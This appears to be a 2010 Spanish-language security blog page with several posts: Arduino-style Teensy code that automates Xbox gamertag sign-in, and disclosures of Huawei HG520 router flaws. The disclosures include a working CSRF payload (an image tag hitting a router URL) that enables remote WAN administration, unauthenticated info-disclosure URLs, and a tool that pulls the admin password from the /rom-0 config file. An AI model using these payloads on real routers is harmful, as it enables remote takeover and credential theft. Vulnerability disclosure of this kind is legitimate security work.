h k m

Blogroll: 7

[x] Agregar a hkm

xianur0 xianur0
pandemic pandemic
84kur10 84kur10
p4n1ck p4n1ck
murder murder
komtec1 komtec1

Perfil de hkm

[x]Nick: hkm
Rango: Amateur
País: mx
Visitas: 12294
Votos: 35
En Blogrolls: 12
Status: PM

Patrocinadores:


Anuncia aquí

Facebook de Hakim.ws - http://facebook.com/hakimws

Publicado el 14/07/2010 12:07:00 en Off Topic.

He creado una página de Facebook para Hakim.ws:

http://www.facebook.com/hakimws

Comentarios: 0 | Leer comentarios

[x] XBOX360 Gamertag Recovery con Teensy 2.0

Publicado el 07/07/2010 12:07:00 en Programación General. Total de votos: 2  Votar

En XBOX existen los Gamer Points. Son una especie de retos que te asignan un puntaje a tu cuenta de Xbox Live. Algunos gamers coleccionan estos puntos, incluso hay algunos que juegan todos los juegos solamente por los puntos. Pero existe un inconveniente...

Si estas en casa de un amigo y quieres acumular estos puntos necesitas "Recuperar tu Gamertag" que es descargar tu perfil en la consola de tu amigo. Este es un proceso lento y si no tienes un teclado USB conectado a tu Xbox es aun mas tardado ya que tienes que introducir letra por letra tu email, password y cuenta de Xbox Live.

Utilizando el controlador Teensy 2.0 se puede emular un teclado y ponerle un programa que envie toda la informacion necesaria en el momento adecuado. Este dispositivo es muy peque~o, del tama~o de una memoria USB y se conecta al Xbox por USB.

En la siguiente liga hay un video que muestra su uso:

http://hakim.ws/teensy/xbox360_gamertag_recovery/

Utilizando el Teensyduino para programarlo como emulador de teclado usb se puede utilizar el siguiente codigo para realizar la recuperacion automatica del gamertag. Unicamente es necesario cambiar GAMERTAG, EMAIL@DDRESS, y PASSWORD:

// XBOX360 Gamertag Recovery using Teensy 2.0
// hkm @ hakim.ws
// http://hakim.ws/teensy/xbox360_gamertag_recovery/
//
// JUST REPLACE FOLLOWING STRINGS:
char gamertag[] = "GAMERTAG";
char email[] = "EMAIL@DDRESS";
char pass[] = "PASSWORD";
// END REPLACE - Done
// Plug before Gamertag field selection


int ledPin = 11;

void setup() {
 pinMode(ledPin, OUTPUT);
}

void loop(){
  delay(3000);
  Enter(); //select Gamertag
  delay(3000);
  CommandAtXbox(gamertag); //send Gamertag
  delay(1000);
  Enter(); //select Done
  delay(5000);
  Enter(); //select Continue
  delay(4000);
  CommandAtXbox(email); //send Email address
  delay(1000);
  Enter(); //select Done
  delay(5000);
  CommandAtXbox(pass); //send Password
  Enter(); //select Sign in
  delay(13000);
  Up();
  Enter(); //select Accept
  while (1)
    delay(20000); //END (you should remove it now)
}

void CommandAtXbox(char  *SomeCommand){ //from irongeek
 digitalWrite(ledPin, HIGH); // set the LED on
 Keyboard.set_modifier(0); //prep release of control keys
 Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
 Keyboard.send_now(); //Send the key changes
 delay(1000);
 Keyboard.print(SomeCommand);
 Keyboard.set_key1(KEY_ENTER);
 Keyboard.send_now();
 Keyboard.set_key1(0);
 Keyboard.send_now();
 digitalWrite(ledPin, LOW); // set the LED off
}

void Enter(){
 delay(1000);
 digitalWrite(ledPin, HIGH); // set the LED on
 Keyboard.set_modifier(0); //prep release of control keys
 Keyboard.set_key1(0); //have to do this to keep it from hitting key multiple times.
 Keyboard.send_now(); //Send the key changes
 delay(500);
 Keyboard.set_key1(KEY_ENTER);
 Keyboard.send_now();
 Keyboard.set... [/url]
[/trombi]

Continúa aquí...

Comentarios: 2 | Leer comentarios

[x] Huawei HG520 /rom-0 herramienta para descompresion

Publicado el 14/06/2010 12:06:00 en Hacking Tools. Total de votos: 3  Votar



Los módems Huawei HG520, y muchos más, utilizan el ZynOS el cual tiene una vulnerabilidad conocida que consiste en poder descargar la configuración sin autenticación. La configuración se encuentra localizada en la interfaz web en /rom-0

El archivo rom-0 es un archivo binario comprimido en formato LZW. Con la información del sitio de Kender podemos crear la herramienta para descomprimir este archivo y parsear la información como clave de administrador, WEP default, versiones, etc.

Desde la siguiente URL se puede descargar el código fuente modificado y una versión compilada de la herramienta:

http://www.hakim.ws/huawei/rom-0

hkm

**Nota: No funciona al 100% en todas las configuraciones.

*Nota2: Esto es lo que varios estaban buscando, una forma para sacar la clave de administracion.

Comentarios: 2 | Leer comentarios

[x] Huawei EchoLife HG520 CSRF para habilitar admin remota

Publicado el 30/05/2010 12:05:00 en Hacking Web. Total de votos: 2  Votar

=========================================
HUAWEI ECHOLIFE HG520 RemoteManagement CSRF
=========================================


Dispositivo: Huawei EchoLife HG520
Version de Software: V100R001B021Telmex
V100R001B020Telmex
Version de Firmware: 3.10.18.7-1.0.7.0 (ultima version)
3.10.18.5-1.0.7.0
Modelos Vulnerables: HG520c
HG520b
Fecha de publicacion: 2010-05-29
Criticidad: Alto
Impacto: Habilita la interfaz de administracion remota en la WAN
Ubicacion: En la interfaz de administracion web (LAN/WAN)
Solucion: No existe solucion disponible en este momento
Websec-id: ws10-12


DESCRIPCION
=======================
Los modems HG520 publican una interfaz de administracion via web en la red local. Las paginas '/Forms/access_cwmp_1', '/Forms/rpQos_1' y '/Forms/rpRManage_1' no requieren autenticacion, se puede realizar un ataque de CSRF para habilitar el acceso a las interfaces de administracion desde internet.


EXPLOIT / POC
=======================
Se habilita el acceso remoto por FTP, TELNET y WEB mandando una peticion GET a:

http://192.168.1.254/Forms/rpRManage_1?ACL_active=0

Se podria usar Client-Side visitando una pagina que contenga:

<IMG SRC=http://192.168.1.254/Forms/rpRManage_1?ACL_active=0>


SOLUCION
=======================
No existe parche o solucion disponible en este momento.


DISCLOSURE TIMELINE
=======================
2010/03/20 - Vulnerability discovered


REFERENCES
=======================
Hakim.Ws - http://www.hakim.ws



Pueden ver el video aqui: http://www.hakim.ws/huawei/HG520_csrf.flv

http://websec.mx/advisories/view/Huawei_EchoLife_HG520_RemoteManagement_CSRF

Comentarios: 2 | Leer comentarios

[x] Huawei EchoLife HG520c revelacion de info en interfaz web

Publicado el 17/05/2010 12:05:00 en Hacking Web. Total de votos: 2  Votar

==============================================
HUAWEI ECHOLIFE HG520c Revelacion de Informacion
==============================================

Dispositivo: EchoLife HG520c
Version de Software: V100R001B021Telmex
V100R001B020Telmex
Version de Firmware: 3.10.18.7-1.0.7.0 (ultima version)
3.10.18.5-1.0.7.0
Modelos Vulnerables: HG520c
Fecha de publicacion: 2010-05-16
Criticidad: Bajo
Impacto: Revelacion de informacion
Donde: En la interfaz de administracion web (LAN/WAN)
Solucion: No existe solucion disponible en este momento


[Descripcion]
=================
La pagina '/Listadeparametros.html' muestra informacion sensible como la
version del software, la IP interna y el nombre de la red inalambrica.
No se necesita autenticacion para abir esta pagina.


[Exploit]
=================
Desde la LAN o por algun ataque Client-Side se puede abrir la pagina
'/Listadeparametros.html':

http://192.168.1.254/Listadeparametros.html

De forma remota, en caso de tener la interfaz web habilitada en la WAN:

http://<IP REMOTA>/Listadeparametros.html



hkm

hkm@hakim.ws



http://websec.mx/advisories/view/Huawei_HG520c_Revelacion_de_Informacion_via_web

Comentarios: 7 | Leer comentarios
Ver: Siguientes 5



Powered by Diosdelared.com CMS Blogs
© Diosdelared 2009